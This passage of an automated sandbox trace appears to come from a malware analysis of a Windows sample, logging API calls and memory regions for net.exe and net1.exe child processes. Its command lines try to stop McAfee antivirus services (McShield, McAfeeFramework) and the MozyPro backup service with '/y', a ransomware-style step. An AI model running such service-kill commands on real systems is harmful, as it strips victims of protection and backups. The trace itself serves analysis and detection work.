_String2="McAfeeFrameworkMcAfeeFramework") returned -9 [0099.591] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeFrameworkMcAfeeFramework") returned -1 [0099.592] _wcsicmp (_String1="server", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.592] _wcsicmp (_String1="svr", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.592] _wcsicmp (_String1="srv", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.592] _wcsicmp (_String1="lanmanserver", _String2="McAfeeFrameworkMcAfeeFramework") returned -1 [0099.592] _wcsicmp (_String1="alerter", _String2="McAfeeFrameworkMcAfeeFramework") returned -12 [0099.592] _wcsicmp (_String1="netlogon", _String2="McAfeeFrameworkMcAfeeFramework") returned 1 [0099.592] _wcsupr (in: _String="McAfeeFrameworkMcAfeeFramework" | out: _String="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned="MCAFEEFRAMEWORKMCAFEEFRAMEWORK" [0099.592] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xace30 [0099.596] GetServiceKeyNameW (in: hSCManager=0xace30, lpDisplayName="MCAFEEFRAMEWORKMCAFEEFRAMEWORK", lpServiceName=0xff685750, lpcchBuffer=0x24fcc8 | out: lpServiceName="", lpcchBuffer=0x24fcc8) returned 0 [0099.597] _wcsicmp (_String1="msg", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 16 [0099.597] _wcsicmp (_String1="messenger", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 2 [0099.597] _wcsicmp (_String1="receiver", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0099.597] _wcsicmp (_String1="rcv", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0099.597] _wcsicmp (_String1="redirector", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0099.597] _wcsicmp (_String1="redir", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0099.597] _wcsicmp (_String1="rdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 5 [0099.597] _wcsicmp (_String1="workstation", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0099.597] _wcsicmp (_String1="work", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0099.598] _wcsicmp (_String1="wksta", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 10 [0099.598] _wcsicmp (_String1="prdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 3 [0099.598] _wcsicmp (_String1="devrdr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -9 [0099.598] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -1 [0099.598] _wcsicmp (_String1="server", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0099.598] _wcsicmp (_String1="svr", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0099.598] _wcsicmp (_String1="srv", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 6 [0099.598] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -1 [0099.598] _wcsicmp (_String1="alerter", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned -12 [0099.598] _wcsicmp (_String1="netlogon", _String2="MCAFEEFRAMEWORKMCAFEEFRAMEWORK") returned 1 [0099.598] NetServiceControl (in: servername=0x0, service="MCAFEEFRAMEWORKMCAFEEFRAMEWORK", opcode=0x0, arg=0x0, bufptr=0x24fcd0 | out: bufptr=0x24fcd0) returned 0x889 [0099.599] wcscpy_s (in: _Destination=0xff6880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.599] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0099.600] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.601] GetFileType (hFile=0xb) returned 0x2 [0099.601] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fb98 | out: lpMode=0x24fb98) returned 1 [0099.602] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24fb90, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x24fb90*=0x1e) returned 1 [0099.602] GetFileType (hFile=0xb) returned 0x2 [0099.602] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fb98 | out: lpMode=0x24fb98) returned 1 [0099.603] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fb90, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x24fb90*=0x2) returned 1 [0099.603] _ultow (in: _Dest=0x889, _Radix=2423808 | out: _Dest=0x889) returned="2185" [0099.603] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.603] GetFileType (hFile=0xb) returned 0x2 [0099.603] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fb98 | out: lpMode=0x24fb98) returned 1 [0099.604] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24fb90, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x24fb90*=0x34) returned 1 [0099.604] GetFileType (hFile=0xb) returned 0x2 [0099.604] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fb98 | out: lpMode=0x24fb98) returned 1 [0099.604] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fb90, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x24fb90*=0x2) returned 1 [0099.605] NetApiBufferFree (Buffer=0xac100) returned 0x0 [0099.605] NetApiBufferFree (Buffer=0xac120) returned 0x0 [0099.605] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" [0099.605] exit (_Code=2) Process: id = "144" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x61269000" os_pid = "0x11d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0x106c" cmd_line = "C:\\Windows\\system32\\net1 stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6392 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6393 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6394 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6395 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6396 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6397 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6398 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6399 start_va = 0xff660000 end_va = 0xff692fff entry_point = 0xff660000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6400 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6401 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6402 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6403 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6404 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 6405 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6406 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6407 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6408 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6409 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6410 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6411 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6412 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6413 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6414 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6415 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6416 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6417 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6418 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6419 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6420 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6421 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6422 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6423 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6424 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6425 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6426 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6427 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6437 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 6438 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 6439 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 565 os_tid = 0x117c [0099.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefeb0 | out: lpSystemTimeAsFileTime=0xefeb0*(dwLowDateTime=0xf08b2f50, dwHighDateTime=0x1d48689)) [0099.612] GetCurrentProcessId () returned 0x11d8 [0099.612] GetCurrentThreadId () returned 0x117c [0099.612] GetTickCount () returned 0x22b05 [0099.612] QueryPerformanceCounter (in: lpPerformanceCount=0xefeb8 | out: lpPerformanceCount=0xefeb8*=1814653100000) returned 1 [0099.613] GetModuleHandleW (lpModuleName=0x0) returned 0xff660000 [0099.613] __set_app_type (_Type=0x1) [0099.613] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff679c9c) returned 0x0 [0099.613] __getmainargs (in: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788, _DoWildCard=0, _StartInfo=0xff68479c | out: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788) returned 0 [0099.613] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.613] GetConsoleOutputCP () returned 0x1b5 [0099.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff68cec0 | out: lpCPInfo=0xff68cec0) returned 1 [0099.614] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.618] sprintf_s (in: _DstBuf=0xefe58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.619] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.620] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.620] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0099.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefbf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0099.621] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.621] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe48 | out: Buffer=0xefe48*=0x174d40) returned 0x0 [0099.621] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe48 | out: Buffer=0xefe48*=0x17c0e0) returned 0x0 [0099.621] _fileno (_File=0x7fefdba2a80) returned 0 [0099.621] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0099.621] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.621] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.621] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.621] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.621] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.621] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.621] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.621] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.622] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.622] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.622] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.622] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.622] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.622] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.622] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.622] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.622] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.622] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.622] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.622] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.622] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.622] _wcsicmp (_String1="accounts", _String2="McShield") returned -12 [0099.622] _wcsicmp (_String1="computer", _String2="McShield") returned -10 [0099.622] _wcsicmp (_String1="config", _String2="McShield") returned -10 [0099.622] _wcsicmp (_String1="continue", _String2="McShield") returned -10 [0099.622] _wcsicmp (_String1="cont", _String2="McShield") returned -10 [0099.622] _wcsicmp (_String1="file", _String2="McShield") returned -7 [0099.623] _wcsicmp (_String1="files", _String2="McShield") returned -7 [0099.623] _wcsicmp (_String1="group", _String2="McShield") returned -6 [0099.623] _wcsicmp (_String1="groups", _String2="McShield") returned -6 [0099.623] _wcsicmp (_String1="help", _String2="McShield") returned -5 [0099.623] _wcsicmp (_String1="helpmsg", _String2="McShield") returned -5 [0099.623] _wcsicmp (_String1="localgroup", _String2="McShield") returned -1 [0099.623] _wcsicmp (_String1="pause", _String2="McShield") returned 3 [0099.623] _wcsicmp (_String1="session", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="sessions", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="sess", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="share", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="start", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="stats", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="statistics", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="stop", _String2="McShield") returned 6 [0099.623] _wcsicmp (_String1="time", _String2="McShield") returned 7 [0099.623] _wcsicmp (_String1="user", _String2="McShield") returned 8 [0099.623] _wcsicmp (_String1="users", _String2="McShield") returned 8 [0099.623] _wcsicmp (_String1="msg", _String2="McShield") returned 16 [0099.623] _wcsicmp (_String1="messenger", _String2="McShield") returned 2 [0099.623] _wcsicmp (_String1="receiver", _String2="McShield") returned 5 [0099.624] _wcsicmp (_String1="rcv", _String2="McShield") returned 5 [0099.624] _wcsicmp (_String1="netpopup", _String2="McShield") returned 1 [0099.624] _wcsicmp (_String1="redirector", _String2="McShield") returned 5 [0099.624] _wcsicmp (_String1="redir", _String2="McShield") returned 5 [0099.624] _wcsicmp (_String1="rdr", _String2="McShield") returned 5 [0099.624] _wcsicmp (_String1="workstation", _String2="McShield") returned 10 [0099.624] _wcsicmp (_String1="work", _String2="McShield") returned 10 [0099.624] _wcsicmp (_String1="wksta", _String2="McShield") returned 10 [0099.624] _wcsicmp (_String1="prdr", _String2="McShield") returned 3 [0099.624] _wcsicmp (_String1="devrdr", _String2="McShield") returned -9 [0099.624] _wcsicmp (_String1="lanmanworkstation", _String2="McShield") returned -1 [0099.624] _wcsicmp (_String1="server", _String2="McShield") returned 6 [0099.624] _wcsicmp (_String1="svr", _String2="McShield") returned 6 [0099.624] _wcsicmp (_String1="srv", _String2="McShield") returned 6 [0099.624] _wcsicmp (_String1="lanmanserver", _String2="McShield") returned -1 [0099.624] _wcsicmp (_String1="alerter", _String2="McShield") returned -12 [0099.624] _wcsicmp (_String1="netlogon", _String2="McShield") returned 1 [0099.624] _wcsupr (in: _String="McShield" | out: _String="MCSHIELD") returned="MCSHIELD" [0099.625] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x17cdf0 [0099.629] GetServiceKeyNameW (in: hSCManager=0x17cdf0, lpDisplayName="MCSHIELD", lpServiceName=0xff685750, lpcchBuffer=0xefd68 | out: lpServiceName="", lpcchBuffer=0xefd68) returned 0 [0099.630] _wcsicmp (_String1="msg", _String2="MCSHIELD") returned 16 [0099.630] _wcsicmp (_String1="messenger", _String2="MCSHIELD") returned 2 [0099.630] _wcsicmp (_String1="receiver", _String2="MCSHIELD") returned 5 [0099.630] _wcsicmp (_String1="rcv", _String2="MCSHIELD") returned 5 [0099.630] _wcsicmp (_String1="redirector", _String2="MCSHIELD") returned 5 [0099.630] _wcsicmp (_String1="redir", _String2="MCSHIELD") returned 5 [0099.630] _wcsicmp (_String1="rdr", _String2="MCSHIELD") returned 5 [0099.630] _wcsicmp (_String1="workstation", _String2="MCSHIELD") returned 10 [0099.630] _wcsicmp (_String1="work", _String2="MCSHIELD") returned 10 [0099.630] _wcsicmp (_String1="wksta", _String2="MCSHIELD") returned 10 [0099.630] _wcsicmp (_String1="prdr", _String2="MCSHIELD") returned 3 [0099.630] _wcsicmp (_String1="devrdr", _String2="MCSHIELD") returned -9 [0099.630] _wcsicmp (_String1="lanmanworkstation", _String2="MCSHIELD") returned -1 [0099.630] _wcsicmp (_String1="server", _String2="MCSHIELD") returned 6 [0099.630] _wcsicmp (_String1="svr", _String2="MCSHIELD") returned 6 [0099.630] _wcsicmp (_String1="srv", _String2="MCSHIELD") returned 6 [0099.630] _wcsicmp (_String1="lanmanserver", _String2="MCSHIELD") returned -1 [0099.631] _wcsicmp (_String1="alerter", _String2="MCSHIELD") returned -12 [0099.631] _wcsicmp (_String1="netlogon", _String2="MCSHIELD") returned 1 [0099.631] NetServiceControl (in: servername=0x0, service="MCSHIELD", opcode=0x0, arg=0x0, bufptr=0xefd70 | out: bufptr=0xefd70) returned 0x889 [0099.631] wcscpy_s (in: _Destination=0xff6880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.632] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0099.632] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.634] GetFileType (hFile=0xb) returned 0x2 [0099.634] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc38 | out: lpMode=0xefc38) returned 1 [0099.634] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefc30, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0xefc30*=0x1e) returned 1 [0099.635] GetFileType (hFile=0xb) returned 0x2 [0099.635] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc38 | out: lpMode=0xefc38) returned 1 [0099.635] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc30, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0xefc30*=0x2) returned 1 [0099.636] _ultow (in: _Dest=0x889, _Radix=982176 | out: _Dest=0x889) returned="2185" [0099.636] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.636] GetFileType (hFile=0xb) returned 0x2 [0099.636] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc38 | out: lpMode=0xefc38) returned 1 [0099.637] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefc30, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0xefc30*=0x34) returned 1 [0099.637] GetFileType (hFile=0xb) returned 0x2 [0099.637] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc38 | out: lpMode=0xefc38) returned 1 [0099.637] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc30, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0xefc30*=0x2) returned 1 [0099.638] NetApiBufferFree (Buffer=0x174d40) returned 0x0 [0099.638] NetApiBufferFree (Buffer=0x17c0e0) returned 0x0 [0099.638] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0099.638] exit (_Code=2) Process: id = "145" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x54acd000" os_pid = "0x1214" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6460 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6461 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6462 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6463 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 6464 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6465 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6466 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6467 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6468 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id 